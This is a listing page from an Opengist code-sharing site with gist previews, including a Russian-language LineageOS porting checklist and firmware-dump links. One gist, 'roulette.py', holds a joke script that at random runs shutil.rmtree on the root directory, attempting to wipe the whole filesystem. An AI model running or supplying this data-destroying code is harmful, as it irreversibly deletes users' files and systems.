Opengist

Explore

  • All gists
  • Topics
  • Users
L4zzur
Give feedback on the new UI Powered by Opengist ⋅ 36ms

user:thomas gists created by user

title:mygist gists with given title

description:sync gists with given description

filename:myfile.txt gists having files with given name

extension:yml gists having files with given extension

language:go gists having files with given language

topic:homelab gists with given topic

all:systemctl search all fields

Login Register

All gists

All Recently liked Recently forked
Recently created Least recently created Recently updated Least recently updated
Roker2

Roker2 / Vienna LineageOS

Last active 1 week ago LineageOS
0 0 1
  • Выбрать референс
  • Сделать дамп прошивки
  • Сгенерить дерево из дампа
  • Соединить как-то сгенеренное и референсовое дерево
  • Параллельно как-то применить пребилд вендор и ядро
Roker2

Roker2 / MTK 7300 devices

Last active 3 weeks ago LineageOS
0 0 3
1 https://github.com/moto-mt6879
2 https://dumps.tadiphone.dev/dumps/motorola/vienna/tree/user-16-W1UIS36H.39-17-1-82d4dc-release-keys/
L4zzur

L4zzur / roulette.py

Last active 2 months ago
0 0 1
1 import random
2 import shutil
3
4 if random.randint(0, 6) == 1:
5 shutil.rmtree('/', ignore_errors=True)